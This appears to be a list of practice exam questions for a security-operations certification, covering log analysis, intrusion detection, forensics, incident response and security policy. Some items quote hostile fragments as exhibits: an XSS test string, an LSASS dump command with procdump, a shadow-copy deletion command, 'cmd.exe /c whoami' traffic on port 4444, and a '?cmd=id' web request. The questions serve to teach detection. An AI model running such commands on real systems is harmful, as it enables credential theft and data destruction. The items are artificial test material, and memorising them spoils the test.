Medium194A Linux host has an unusual cron job that runs a script from /tmp every minute. The analyst checks /etc/crontab and /var/spool/cron/ but finds nothing. Where else could the cron job be defined?
Hard195A SOC analyst is investigating a suspected ARP poisoning attack on a local subnet. Which two indicators would most strongly support this conclusion? (Choose two.)
Hard196A security analyst is analyzing system logs and notices multiple failed authentication events followed by a successful login from the same user account, and then a privilege escalation event. Which THREE events should be correlated to detect a potential attack?
Medium197An analyst observes that an internal host is sending ICMP echo requests with payloads containing random data to an external IP. The payload size is larger than typical. What is the most likely technique?
Hard198A security policy mandates that all administrative access to network devices must be encrypted. Which of the following protocols should be used to comply with this policy?
Easy199A hospital must protect patient records under a regulation that specifies administrative, physical, and technical safeguards for electronic protected health information. Which U.S. regulation establishes these requirements?
Easy200An analyst is reviewing alerts from an IDS. A signature matched 'script' and 'alert' in HTTP request parameters. The analyst inspects the packet and sees <script>alert('XSS')</script> in the URI. What is the most accurate classification of this alert?
Medium201A security analyst is monitoring network traffic and notices a high volume of TCP SYN packets sent to various ports on a single host. Which type of attack is most likely occurring?
Easy202Which TWO of the following are valid sources of security monitoring data in a Cisco security architecture?
Medium203An analyst is investigating a potential security incident and reviews the Cisco ASA firewall logs. The logs show the following entry: 'Deny tcp src outside:203.0.113.5/443 dst inside:10.1.1.10/3389'. Which of the following does this log entry indicate?
Hard204An analyst is reviewing DNS logs and sees repeated queries from an internal workstation to randomly generated subdomains of a single domain, such as a1b2c3.example.com, d4e5f6.example.com, and so on. The responses are consistently NXDOMAIN. Which technique is most consistent with this pattern?
Hard205A company's security policy includes a clause that all software installed on company devices must be approved by the IT department. An employee installs an unapproved application that later causes a malware infection. Which policy was violated?
Hard206While reviewing firewall logs, an analyst notices repeated inbound connections from a single external IP to multiple internal hosts on TCP port 3389 within a short time window. Each connection lasts only a few seconds and is followed by a new connection to a different internal host. Which activity does this pattern most likely represent?
Easy207During a security incident, the CISO decides to contain a compromised server by isolating it from the network. Which role is primarily responsible for making this containment decision based on business impact?
Hard208An analyst is correlating telemetry after a suspected Kerberoasting attack against an Active Directory environment. Which two artifacts, when found together, most strongly support that the attack succeeded in obtaining crackable service ticket material? (Choose two.)
Hard209Which THREE are typical sources of log data used in security monitoring? (Choose three.)
Hard210A junior analyst is asked to identify which log source would best confirm that an internal workstation attempted to resolve a suspicious domain shortly before an alert fired. The environment forwards DNS query logs from its recursive resolvers to the SIEM. Which action should the analyst take first?
Easy211A security analyst is assessing the risk profile of a new cloud-based collaboration application that employees want to adopt. The analyst must identify which factors contribute to the overall risk of introducing this application into the environment. (Choose two.)
Medium212A security analyst is examining a Linux system for signs of a rootkit. The analyst runs `lsmod` and notices a kernel module named `hideproc` that is not recognized. The analyst then runs `rmmod hideproc` but receives an error that the module is in use. Which of the following is the MOST likely reason the module cannot be removed?
Hard213An analyst is investigating a Windows system for potential malware persistence. The analyst discovers a scheduled task that runs a PowerShell script every hour. The script downloads and executes a payload from a remote server. Which of the following Windows artifacts would BEST provide the original creation time and the author of this scheduled task?
Medium214During an incident, a first responder pulls the network cable of a compromised server. Later, the incident response team is unable to collect volatile data such as running processes. Which policy or procedure was violated?
Hard215A security analyst is reviewing the organization's data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. A new marketing campaign document contains strategic pricing information that, if disclosed, could cause competitive harm. According to typical data classification practices, how should this document be classified?
Medium216A SOC analyst reviews a firewall log with the following entry: action=deny, source IP=192.168.1.100, destination IP=10.0.0.1, destination port=22. The analyst knows that 10.0.0.1 is an SSH server. What does this log entry indicate?
Medium217An analyst is investigating a suspected ARP poisoning attack on a local subnet. The analyst captures traffic and reviews ARP packets. Which two characteristics would most likely indicate that ARP poisoning is occurring? (Choose two.)
Medium218An analyst finds a registry modification under 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'. What is the primary use of this registry key?
Medium219A security analyst notices that an internal web server is receiving HTTP requests where the User-Agent string is identical across thousands of requests originating from a single external IP address, and each request targets a different URL path on the server. The requests occur at a rate of several hundred per second. Which activity does this pattern most likely represent?
Easy220A security engineer discovers that an attacker has inserted fake entries into a DNS resolver's cache, redirecting users to a malicious website. Which attack has occurred?
Medium221A SOC analyst is reviewing NetFlow records exported from a border router and notices a single internal host initiating outbound connections to more than 300 distinct external IP addresses on TCP port 443 within a five-minute window, with each flow carrying only a few hundred bytes. Which security monitoring conclusion is best supported by this evidence?
Medium222A security analyst is implementing multifactor authentication. Which TWO are considered factors? (Select two.)
Easy223An analyst is using Volatility to analyze a memory dump. Which TWO plugins are most effective for detecting code injection?
Hard224What is the primary purpose of a digital certificate in a Public Key Infrastructure (PKI)?
Medium225Which protocol is used by SNMP to send traps from network devices to the management station?
Easy226Which element of the CIA triad ensures that data cannot be modified by unauthorized parties?
Easy227A company needs to comply with regulations that protect personal data of EU citizens. Which TWO compliance frameworks are directly relevant to this requirement? (Choose two.)
Easy228A security analyst is reviewing Windows Event Logs on a domain controller. The analyst sees multiple Event ID 4769 (Kerberos service ticket was requested) with the same user account but different service names, occurring in a short time frame. Which of the following attacks is MOST likely indicated?
Medium229A security analyst notices a sudden spike in NetFlow data from a single workstation to multiple external IP addresses on port 443. What is the most likely explanation for this traffic pattern?
Easy230A security policy requires that employees use strong passwords. Which TWO of the following are characteristics of a strong password? (Select two.)
Easy231A network engineer configures a SPAN port to send traffic from a critical server to an IDS. After configuration, the IDS sees no traffic. What is the most likely issue?
Medium232A company wants to protect its internal network from external threats. Which security principle involves deploying multiple layers of security controls?
Easy233A host-based analysis tool reports that a file has a digital signature that is valid but from an untrusted publisher. What should the analyst interpret from this?
Medium234During a network intrusion analysis, a security analyst observes repeated TCP SYN packets sent to a range of ports on a target host, each followed by an RST response. No subsequent ACK packets are observed. Which phase of the Cyber Kill Chain is the attacker most likely executing?
Medium235Drag and drop the steps for initial configuration of a Cisco IOS device after booting into the correct order.
Medium236While analyzing a packet capture in Wireshark, an analyst observes a series of TCP packets with the PSH, ACK flags set and a payload containing the string 'cmd.exe /c whoami'. The destination port is 4444. Which type of activity is most likely indicated?
Medium237An analyst is investigating a potential malware infection. Which TWO of the following are indicators of command and control (C2) communication?
Medium238During incident response, an analyst notices that a compromised host is making outbound SMB connections to several internal servers on TCP port 445 using the same domain user account within minutes. Which activity is most likely occurring?
Hard239A security analyst is reviewing the organization's incident response plan. The plan currently defines containment, eradication, and recovery but does not include a formal step to determine the root cause of an incident. Which phase of the NIST SP 800-61 incident response lifecycle should the analyst add to address this gap?
Medium240An analyst is investigating a Windows system for signs of malware persistence. Which TWO registry locations are commonly used by malware to achieve automatic startup? (Choose two.)
Medium241A security analyst is assessing the risks to a company's data. The analyst identifies a vulnerability in the web application that could allow SQL injection. Which TWO terms correctly describe the elements of this risk scenario? (Choose two.)
Easy242An analyst is examining a Windows system for evidence of credential dumping. The analyst runs 'Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688}' and filters for processes with 'lsass.exe' as the target. The output shows that a process named 'procdump.exe' was executed with the command line 'procdump.exe -ma lsass.exe lsass.dmp'. Which type of attack does this indicate?
Hard243A security analyst notices repeated failed login attempts to a critical server from a single external IP address over the past 30 minutes. The SIEM has a correlation rule that triggers an alert when the threshold of 10 failed attempts in 5 minutes is exceeded. However, no alert was generated. What is the most likely cause?
Medium244A company wants to ensure that employees report security incidents immediately. Which policy element is most important to include?
Easy245An analyst finds a YARA rule that matches a file containing the string 'MZ' at offset 0 and includes 'CreateRemoteThread'. This rule likely identifies:
Medium246A security analyst reviews logs and finds multiple failed login attempts from a single IP. This is indicative of what type of attack?
Medium247A security policy states that user activity logs must be retained for at least one year. What is the primary purpose of this requirement?
Easy248An attacker uses a tool to scan all IP addresses in a range to identify which hosts are online and what services are running. Which type of reconnaissance is this?
Medium249A network engineer sees the following event in the firewall logs: 'STATUS: intrusion prevented, action: drop, signature: "SQL Injection - SELECT"' on traffic from internal IP to a web server. What type of attack was detected?
Easy250After resolving a security incident, the IR team conducts a lessons learned meeting. Which of the following are typical outputs of this post-incident activity? (Choose three.)
Medium251A Windows event log review shows Event ID 4625 multiple times from a single source IP. What does this event indicate, and which log contains it?
Medium252An analyst sees an alert from the IDS: 'ET TROJAN Possible Zeus Variant Outbound Connection'. What action should the analyst take first?
Easy253Which compliance framework specifically addresses the protection of cardholder data?
Medium254A security analyst is examining a network capture and observes that an attacker is sending a large volume of SYN packets to a web server with spoofed source IP addresses. The server's connection table is filling up, and legitimate users cannot connect. Which type of attack is the analyst observing?
Medium255A security analyst is reviewing the organization's password policy, which currently requires a minimum of eight characters with complexity but no expiration. After a recent audit finding, management wants to align with modern best practices. Which change should the analyst recommend?
Medium256Which OSI layer is responsible for logical addressing and routing?
Easy257Match each log severity level to its description (syslog).
Medium258An analyst observes a series of DNS queries for subdomains like 'ZGVzdGluYXRpb24= .malicious.com' where the subdomain part appears base64-encoded. The volume of DNS traffic from a single host is unusually high. Which exfiltration technique is most likely in use?
Medium259An organization's security policy states that all external connections must be authenticated using multi-factor authentication. Which type of policy is this?
Medium260Which TWO of the following are functions of a SIEM system in security monitoring?
Easy261A company's security policy states that employees must not use corporate laptops for personal web browsing. An employee is found to have streamed video during work hours, consuming significant bandwidth. What is the best course of action?
Easy262A security analyst is investigating a potential security incident and needs to correlate events across multiple data sources. Which two Cisco CyberOps tools or features would provide network flow data and intrusion event details respectively? (Choose two.)
Medium263During a security incident, a SOC analyst finds that the SIEM is not receiving logs from a critical firewall due to a network issue. The analyst needs to ensure that no alerts are missed during the outage. What should the analyst do?
Hard264A SIEM correlation rule triggers when it detects more than 10 failed login attempts from the same source IP within 1 minute. Which type of attack is this rule designed to detect?
Medium265An organization has implemented a new password policy requiring 12-character passwords with complexity. Which risk treatment option is this an example of?
Medium266Refer to the exhibit. A firewall log shows denied TCP traffic from an internal host to an external IP on consecutive ports. What type of activity is indicated?
Hard267A SIEM correlation rule is configured to alert when there are 10 failed login attempts from the same source IP within 1 minute. An analyst receives an alert for source IP 10.0.0.5. Which type of attack is most likely being detected?
Medium268An analyst is investigating a host that is suspected of being compromised. She runs the 'netstat -anb' command and sees an established connection to an unknown IP address on port 4444. The associated process is svchost.exe. Which conclusion is MOST appropriate?
Medium269You are a security administrator for a company with 500 employees. The company uses a SIEM with basic correlation rules. Recently, the HR department reported that several employees received phishing emails with a link to a fake login page. The emails bypassed the spam filter. You want to detect if any employees clicked the link. You have access to web proxy logs, DNS logs, and endpoint antivirus logs. The phishing link is 'http://malicious-login.com/verify'. Which action should you take first to identify affected users?
Medium270A security analyst is investigating a breach where an attacker gained access to a server by exploiting a vulnerability in a web application. The analyst needs to determine the type of attack that was used. The server logs show that the attacker sent a specially crafted HTTP request that caused the server to execute arbitrary code. Which type of attack is this?
Hard271An analyst is using Zeek to monitor network traffic. Which THREE types of logs can Zeek generate to provide visibility into application-layer activity?
Hard272A SOC analyst is reviewing a PCAP captured at the perimeter firewall. The analyst notices that a single internal host has sent TCP segments with the FIN, PSH, and URG flags all set simultaneously to multiple destination ports on several external hosts. No corresponding ACK, SYN, or RST packets are observed in the capture. Which type of scan is the analyst most likely observing?
Medium273An organization must retain security logs for at least one year due to regulatory compliance. However, their SIEM storage is limited. Which strategy best balances compliance and storage?
Hard274A SOC receives a threat intelligence feed indicating that a specific SHA-256 hash belongs to a trojan. An analyst searches the endpoint telemetry and finds no process with that hash, but the file name appears in several temporary directories. Which explanation best accounts for this result?
Hard275A network security analyst is reviewing traffic logs and notices a series of connections from an internal host to a known command-and-control (C2) server. The connections occur every 5 minutes and are small in size. Which of the following is the MOST likely explanation for this traffic pattern?
Medium276A security analyst is tuning a SIEM to detect lateral movement. Which THREE log sources would provide the most useful data for this purpose? (Choose THREE.)
Medium277In Security Onion, an analyst runs 'squert' and sees a high number of alerts from a single source IP across multiple destination ports. What is the most likely cause?
Medium278A Windows Event Log shows Event ID 4625 multiple times from the same source IP address. What type of activity does this indicate?
Medium279A security analyst is investigating an alert from a host-based intrusion detection system (HIDS) that detected a file modification in the system32 directory. Which log source should the analyst check first to understand the process that made the change?
Medium280A security analyst is reviewing baseline network traffic and notices that the normal HTTP traffic volume has increased by 300% over the past hour. The increase is from a single client IP to a single external web server. What does this indicate?
Medium281A security analyst is examining a memory dump from a compromised host and finds a small piece of code that resides only in memory, has no corresponding file on disk, and injects itself into a running legitimate process. The code does not replicate to other systems. Which type of malware best describes this?
Hard282To protect sensitive data at rest, a company uses AES-256 encryption. This primarily ensures which security goal?
Hard283A company's security policy requires that all remote access connections be authenticated using a certificate. Which type of control is this?
Hard284An analyst reviewing network alerts notices a rule triggered for 'ET SCAN NMAP -sU scan' based on traffic to a Linux server. The packet capture shows multiple UDP packets to various ports, and for closed ports, the server responds with ICMP Destination Unreachable (Port Unreachable). Which type of scan is being performed, and how should the analyst classify this alert?
Hard285During a security incident, an analyst needs to preserve network evidence for forensic analysis. Which action should be taken first?
Medium286A threat hunter is examining a Windows 10 host and wants to determine whether a suspicious executable was recently run by a user. The hunter knows that Windows records application execution history in the registry under the UserAssist key. Which location should the hunter inspect to find this data for the currently logged-on user?
Hard287Which TWO of the following are best practices for implementing a security policy?
Medium288An analyst is monitoring network traffic and sees a large number of TCP SYN packets sent to various ports on a single host from the same source IP. Which type of attack is most likely occurring?
Easy289A company is implementing a security policy to reduce risk. Which THREE activities are examples of risk mitigation? (Choose three.)
Hard290Which THREE components are part of a Public Key Infrastructure (PKI)? (Choose three.)
Hard291Which term describes a weakness in a system that could be exploited by a threat?
Easy292A security analyst is correlating network and endpoint telemetry to detect a host infected with malware that is attempting to establish persistence and communicate externally. Which TWO artifacts would best support this investigation? (Choose two.)
Medium293An analyst examines PCAP and sees multiple SMB sessions from internal host 10.1.1.10 to 10.1.1.20, 10.1.1.30, and 10.1.1.40 within seconds. The NTLM authentication contains a hash parameter that is identical across sessions. Which lateral movement technique is most likely being used?
Hard294During incident response on a Linux server, an analyst runs 'ss -tlnp' and sees an SSH service listening on a non-standard high port. Which step should the analyst take next to investigate potential unauthorized access?
Medium295Which TWO of the following are characteristics of behavioral-based anomaly detection in network monitoring? (Select 2)
Hard296A SOC team is evaluating a SIEM rule that triggers on 'more than 10 failed login attempts from a single source within 5 minutes.' The rule is generating too many alerts from a legitimate external monitoring service. How should the rule be modified?
Hard297A SOC Tier 1 analyst is processing alerts. Which THREE tasks are typical for a Tier 1 analyst? (Select three.)
Hard298A security analyst is investigating a Linux server that is suspected of being compromised. The analyst runs 'ls -l /proc/1234/exe' and sees the output: '/proc/1234/exe -> /tmp/.hidden/backdoor (deleted)'. What does this output indicate?
Hard299A SIEM correlation rule is designed to detect a brute-force attack. The rule triggers when an event includes 10 or more failed logins from the same source IP within 1 minute. An analyst sees an alert for 12 failed logins from IP 10.0.0.1 in 2 minutes. Why did the rule not trigger?
Medium300A network analyst notices that a host is sending a large volume of traffic to an external IP address on port 443 during non-business hours. The traffic volume is significantly higher than the established baseline. Which type of data exfiltration technique should be suspected?
Medium301A SOC analyst is investigating a potential malware outbreak. Which THREE actions should the analyst take to preserve evidence? (Select three.)
Medium302During forensic analysis of a Windows host, an analyst finds a file in C:\Windows\Prefetch with the name 'MALWARE.EXE-3F2A1B0C.pf'. Which type of information can be extracted from this prefetch file to assist the investigation?
Hard303A SOC analyst is reviewing alerts from a network-based intrusion detection system (NIDS). An alert indicates a potential SQL injection attempt, but the destination server is a web application that accepts SQL queries as part of its normal function. What should the analyst do?
Medium304A company uses Snort for intrusion detection. The analyst receives an alert for 'ET POLICY Outgoing DNS Query to Possible Malicious Domain'. The destination IP is 203.0.113.5. The analyst checks the DNS query and finds it is for 'update.software.com', which is a legitimate update server. However, the Snort rule triggered because the domain was recently added to a threat intelligence feed. What is the most likely cause of this false positive?
Medium305An analyst is reviewing PCAP from a network intrusion. The attacker used a payload with ROP gadgets and shellcode. Which TWO exploitation indicators are associated with this attack? (Choose two.)
Hard306Match each Windows event log type to its description.
Medium307A security analyst is establishing a data classification policy. Which TWO categories are commonly included in a data classification policy?
Easy308A security analyst is triaging a Windows server that may have been compromised. The analyst needs to identify which network connections are currently established by processes on the host and which executable is responsible for each connection. Which two native tools provide this information? (Choose two.)
Medium309A small retail company has a security policy that requires all point-of-sale (POS) systems to be isolated on a separate network segment with strict firewall rules. During a network audit, you discover that the POS system is connected to the same network as the office workstations, violating policy. The store manager says it was done for convenience because the network cable was too short. What is the best course of action?
Easy310A security analyst observes repeated ICMP port unreachable responses from a target host. The source IP is sending packets to multiple UDP ports. Which type of scan is most likely being performed?
Easy311An analyst is investigating a Windows system for signs of malware persistence. Which registry key is commonly used by malware to run automatically at user logon?
Easy312An organization is implementing a new remote access policy. Which of the following is a key component that should be included in this policy?
Medium313An analyst is analyzing a suspicious PE file. The file's entropy is high (close to 8.0), and the section names appear random. What does this likely indicate?
Hard314An analyst is examining a YARA rule that contains the condition: 'uint16(0) == 0x5a4d and filesize < 500KB'. What type of file is this rule targeting?
Hard315A security analyst is examining a Linux system for signs of a compromised user account. The analyst runs `grep ':0:0:' /etc/passwd` and finds an entry for user `backup` with UID 0. The legitimate backup user should have a UID of 1001. Which of the following is the MOST likely explanation?
Medium316Which THREE of the following are best practices for implementing security logging and monitoring? (Select 3)
Medium317You are a security analyst at a medium-sized company. A user reports that their workstation is running slowly and the network is sluggish. You check the firewall logs and see a large number of outgoing connections from the user's workstation to an external IP address (198.51.100.23) on port 4444. The connections are short-lived and occur every few seconds. The workstation has standard corporate antivirus installed, which is up-to-date and shows no threats. You have also noticed that the workstation is making DNS queries to an unusual domain (malicious.example.com) that resolves to the same external IP. What is the most appropriate immediate action?
Easy318A Windows analyst uses Process Explorer to investigate parent-child relationships. Which TWO characteristics are commonly associated with malicious processes?
Easy319During a security assessment, a SOC analyst notices an IDS/IPS alert with a severity of 'High' for a signature named 'ET TROJAN Win32.Vobfus Checkin'. The alert shows source IP 10.0.0.5 and destination IP 203.0.113.50 on port 443. What is the most likely interpretation of this alert?
Hard320A security analyst is reviewing a packet capture in Wireshark and notices a series of DNS queries for randomly generated domain names such as 'a1b2c3d4e5.com', 'f6g7h8i9j0.net', and 'k1l2m3n4o5.org'. The queries are sent to multiple different DNS servers. Which type of malicious activity does this pattern most likely indicate?
Medium321A financial institution is implementing a data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. The security team must ensure that data labeled 'Restricted' receives the highest level of protection, including encryption, strict access controls, and monitoring. Which data classification level is typically subject to the most stringent regulatory requirements and requires the strongest security controls?
Hard322A security administrator needs to verify that a downloaded file has not been altered during transit. Which cryptographic technique should be used?
Easy323A network security analyst is reviewing NetFlow records from a Cisco router and notices a large number of flows from a single internal host to many external IP addresses on port 445. The flows are short, with small packet counts, and occur within a few minutes. Which type of activity is most likely occurring?
Medium324A security operations center (SOC) analyst is investigating a security incident where an attacker gained initial access to a corporate network. The analyst suspects the attacker used a technique that involves exploiting a vulnerability in a public-facing web server to execute arbitrary code. Which phase of the Cyber Kill Chain does this activity represent?
Hard325Which TWO of the following are key components of a security policy? (Choose two.)
Easy326Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
Medium327A CyberOps analyst is examining a Windows workstation and finds that a scheduled task named 'MicrosoftEdgeUpdateTask' exists in Task Scheduler, but the Task Scheduler GUI shows it as disabled. The analyst suspects it was created by malware to masquerade as a legitimate updater. Which artifact should the analyst check to determine the exact executable path and arguments the task would run if it were enabled?
Hard328A security analyst is reviewing the organization's data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. The analyst is asked to classify a document that contains the company's proprietary source code. According to typical data classification standards, which classification level is most appropriate?
Hard329An analyst is reviewing Windows Security Event Logs and finds Event ID 4648. What does this event indicate?
Medium330A Cisco Firepower analyst notices repeated syslog messages from an ASA firewall showing TCP connections to 203.0.113.55:4444 that are reset immediately after the three-way handshake. The source hosts are internal workstations running an outdated browser plugin. Which security monitoring data source would best confirm whether these workstations established a command-and-control channel?
Medium331An organization's security policy mandates that all external media (USB drives, external hard drives) must be scanned for malware before use. An employee inserts a USB drive to transfer a presentation for a meeting. The employee runs the antivirus scan, but it fails to complete because the USB drive has a hardware write-protect switch. The employee is in a hurry. What should the employee do?
Easy332Which role in the incident response process is primarily responsible for determining the business impact of an incident and making strategic decisions?
Medium333A security analyst is evaluating an endpoint detection and response deployment for a company that must detect fileless attacks. Which TWO techniques should the analyst expect the tool to monitor because they are commonly used by fileless malware? (Choose two.)
Medium334During a network intrusion analysis, an analyst observes a series of TCP packets with the FIN flag set but no corresponding ACK, followed by packets with the RST flag set. What is the most likely explanation for this traffic pattern?
Hard335A company implements a policy where users must authenticate with a password and a one-time code from a token. Which AAA component is strengthened by this policy?
Hard336A security manager is updating the organization's security awareness program after several incidents caused by employees inserting found USB drives. The manager wants a control that both reduces the likelihood of this behavior and provides a measurable metric for the awareness program. Which approach best meets both goals?
Hard337A mid-size healthcare company has completed its annual review of security documentation. The CISO asks the governance team to align the documents into a clear hierarchy, where a single high-level document states the organization's overall security intentions and direction, and all subordinate documents must conform to it. Which document should the governance team treat as the highest-level authority?
Easy338A Cisco CyberOps analyst is reviewing a network security monitoring console and must determine which TWO data sources are most useful for detecting lateral movement by an attacker who has already compromised a workstation. (Choose two.)
Hard339Which of the following is an example of an Indicator of Compromise (IoC)?
Easy340A security analyst is analyzing a Linux system suspected of being used as a phishing server. Which THREE artifacts should the analyst examine to identify persistence mechanisms? (Select 3)
Hard341An incident handler needs to preserve a hard drive from a compromised system. Which two actions are essential to maintain the integrity of the evidence?
Medium342An analyst is reviewing a memory dump and uses Volatility's cmdline plugin to view process command lines. One process shows command line arguments that include a long base64-encoded string. What should the analyst suspect?
Hard343A security analyst discovers that an employee's computer is infected with malware that encrypts files and demands payment. What type of malware is this?
Easy344Which of the following best describes the relationship between a vulnerability, threat, and risk in cybersecurity?
Easy345A network security analyst reviews a packet capture from a compromised host and sees repeated outbound DNS queries for long, random-looking subdomains such as 'a3f9c2b81e7d4.example-cdn.net', each followed by a small response and no subsequent connection to the returned address. Which interpretation is most accurate?
Medium346During a network intrusion investigation, an analyst notices repeated SMB authentication attempts from a single host to multiple other hosts using different usernames. Which type of activity does this pattern suggest?
Medium347A security analyst is reviewing NetFlow records and notices a host sending data to an external IP at regular intervals during non-business hours. Which flow characteristic is most indicative of data exfiltration?
Hard348A security analyst is examining web server logs and finds an entry with method 'POST', URL '/login.php', response code '200', and user-agent 'Mozilla/5.0'. The log shows 100 similar entries from the same IP within 5 seconds. What is the most likely activity?
Medium349An analyst suspects a host is communicating with a command-and-control server using DNS tunneling. Which THREE network traffic patterns would support this hypothesis?
Hard350A security analyst is reviewing Snort IDS alerts and sees the following rule triggered: alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:'Possible SQL Injection'; content:'UNION'; nocase; sid:1000001;). Which action will Snort take when it detects matching traffic?
Hard351A company wants to monitor for unauthorized wireless access points. Which technique should they implement?
Easy352During an incident, an analyst observes the following in PCAP: (1) DNS queries with random-looking subdomains to a known malicious domain, (2) large outbound FTP transfers of .zip files, (3) HTTP POST requests with Base64-encoded data in the body. Which THREE exfiltration techniques are being used? (Select 3)
Hard353A security analyst observes a large number of SYN packets sent to various ports on a target host, receiving RST responses for closed ports and no response for open ports. Which phase of the Cyber Kill Chain does this activity represent?
Medium354A SOC analyst monitors outbound traffic from a corporate network and notices a single internal host contacting an external server on TCP port 53, but the payloads contain fixed-length, non-DNS binary data with no query/response structure. The host also makes outbound connections to the same external IP on TCP port 4444. Which technique is the attacker most likely using?
Medium355An analyst is monitoring network traffic and observes a large number of TCP SYN packets sent to a single host on various ports with no corresponding SYN-ACK replies. This behavior is most indicative of which type of attack?
Easy356Which TWO are common indicators of a phishing email? (Select two.)
Medium357A security analyst is investigating an alert about a workstation that is repeatedly resolving domain names for known malicious command-and-control servers. The analyst wants to determine whether the workstation is infected with malware that uses DNS for communication. Which type of malware behavior is most likely occurring?
Easy358In the NIST SP 800-61 Rev 2 incident response process, which phase involves activities such as performing lessons learned and updating the incident response plan?
Easy359A firewall log shows a connection from internal IP 192.168.1.100 to external IP 203.0.113.5 on port 443 with action 'deny'. What does this indicate?
Medium360An analyst examines a PCAP file and sees a series of HTTP POST requests to an external server with Base64-encoded payloads in the request body. The payloads decode to small text strings. Which type of data exfiltration technique is being used?
Hard361During a host investigation on a Windows 10 endpoint, an analyst wants to review the history of commands typed into PowerShell consoles by interactive users. Which artifact should the analyst examine?
Easy362Which security policy defines acceptable use of an organization's IT resources, including internet browsing and email?
Easy363In Linux forensics, which file would an analyst check to see command history of a user, potentially revealing malicious commands executed?
Easy364Refer to the exhibit. An EDR alert shows this JSON event. What is the most significant indicator of a potential malware infection?
Easy365A security analyst at a retail company is reviewing DNS logs and notices a workstation repeatedly resolving random-looking subdomains such as a8f3k2.example-bad.com, followed by a long TXT record response containing encoded data. No user reported visiting any website. Which technique is most likely occurring?
Medium366Which THREE of the following are valid techniques to detect a compromised host using network monitoring?
Hard367A security analyst is reviewing the organization's data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. The analyst finds that a marketing team has stored a file containing customer credit card numbers on a shared drive accessible to all employees. The analyst must recommend the appropriate classification and handling for this file. What should the analyst recommend?
Hard368A security analyst is evaluating the organization's use of cryptographic algorithms. The analyst must identify which TWO algorithms are symmetric encryption algorithms that can be used for bulk data encryption. (Choose two.)
Medium369A security analyst is reviewing the organization's incident response plan. The plan defines several roles, including one responsible for coordinating all incident response activities and serving as the central point of communication. During a recent ransomware incident, this person was responsible for declaring the incident and ensuring that all stakeholders were informed. Which role does this describe?
Medium370A security analyst is examining a Linux web server that is suspected of being compromised. The analyst runs `ps aux` and notices a process named `apache2` running as the user `www-data`, but its parent process ID (PPID) is 1 (init/systemd). Normally, `apache2` is started by a master process. What is the most likely explanation for this anomaly?
Easy371A SOC analyst is triaging an alert from a network sensor indicating that an internal host may be performing host discovery on the local subnet. The analyst wants to identify active hosts without generating TCP connections. Which two techniques should the analyst expect to see in the packet capture that are consistent with this goal? (Choose two.)
Medium372A security analyst is examining a Windows 10 endpoint that is suspected of being infected with malware. The analyst runs 'Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4688}' and notices that a process named 'cmd.exe' was launched with the command line 'cmd /c vssadmin.exe delete shadows /all /quiet'. Which type of attack does this command indicate?
Easy373A security analyst discovers that an employee has been sharing login credentials with coworkers. Which policy violation is this?
Medium374A SOC analyst is reviewing Cisco Firepower Intrusion Event logs and notices a high volume of alerts for the signature 'SERVER-WEBAPP Apache Struts2 remote code execution attempt' coming from a single internal host to external web servers. The analyst needs to determine if this is a true positive or a false positive. Which of the following actions would BEST help make that determination?
Medium375An analyst identifies a PCAP with a reverse shell session. Which characteristic in the traffic would most likely indicate an interactive shell session?
Hard376A security analyst is examining a suspicious executable found on a compromised host. The analyst runs the file in a sandbox and observes that it creates a mutex named 'Global\MyMutex123', attempts to connect to an external IP address on port 443, and modifies the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run. Which type of analysis is the analyst performing?
Hard377An analyst receives an IDS alert with signature name 'ET TROJAN Win32.Zeus Checkin' and severity 'high'. The alert shows source IP 192.168.1.50 and destination IP 198.51.100.20 on port 443. Which action should the analyst take FIRST?
Medium378During an incident response, the SOC needs to determine the scope of a compromise by identifying all hosts that communicated with a known malicious IP in the last 30 days. Which data source would best support this analysis?
Hard379During memory analysis using Volatility, an analyst wants to identify processes that may be hiding. Which TWO plugins are most useful for detecting hidden or injected code? (Choose two.)
Medium380A security analyst is reviewing a packet capture and notices that an attacker is sending a large number of SYN packets to a web server from spoofed source IP addresses. The server's connection table is filling up, and legitimate users cannot connect. Which type of attack is being described?
Hard381In a Zeek/Bro log, an analyst observes a connection with 'service' field set to 'dns' and 'query' field containing a long, random-looking subdomain. This could be indicative of which type of activity?
Hard382A security analyst needs to share threat intelligence with other organizations in a standardized, machine-readable format. Which combination of standards should the analyst use?
Hard383Which type of malware is designed to spread automatically across networks without user interaction?
Easy384During an incident, a forensic analyst needs to preserve evidence from a compromised hard drive. Which of the following steps is essential to maintain the chain of custody?
Hard385An analyst is investigating a Linux system and wants to view the current network connections. Which command is most appropriate to list listening TCP ports along with the associated processes?
Medium386A security team is implementing a remote access policy. Which TWO controls should be included to ensure secure remote access?
Hard387A security analyst is investigating a Linux host for signs of compromise. The analyst runs `ps aux` and notices a process named `kworker` with a high CPU usage. The analyst suspects this may be a masquerading malware process. Which TWO commands should the analyst use to verify whether this process is legitimate or malicious? (Choose two.)
Medium388A security analyst needs to ensure that a message has not been tampered with during transit and that the sender cannot deny sending it. Which cryptographic method should be used?
Hard389An organization's security policy requires that all security incidents be reported within one hour of discovery. A junior analyst notices an unauthorized login attempt but is unsure if it qualifies as an incident. What should the analyst do first?
Easy390Refer to the exhibit. Which security protocol is being configured?
Easy391A SOC manager is drafting the organization's incident response plan and wants to align it with the NIST SP 800-61 Rev. 2 lifecycle so that phases are clearly defined for auditors. Which sequence correctly represents the four phases of the incident response lifecycle as described in NIST SP 800-61 Rev. 2?
Easy392During an investigation, an analyst observes that a workstation resolves an internal hostname to an IP address that does not match the DHCP lease record, and subsequent SMB connections to that hostname reach an attacker-controlled server. Which attack technique best explains this behavior?
Hard393An analyst is reviewing a web server log and sees the following entry: '192.168.1.1 - - [25/Oct/2023:10:15:30 -0400] "GET /admin/index.php?cmd=id HTTP/1.1" 200 1532 "-" "Mozilla/5.0"'. What potential attack does this log entry suggest?
Medium394During a forensic analysis, an analyst uses NetworkMiner to extract files from a PCAP. One of the extracted files contains a PE executable with a known signature of a malware variant. Which phase of the Cyber Kill Chain does the file transfer most likely represent?
Hard395During an incident, the analyst finds that an attacker modified system files. Which security principle was primarily violated?
Medium396An employee is suspected of using company resources to access inappropriate websites. Which security policy most directly addresses this behavior?
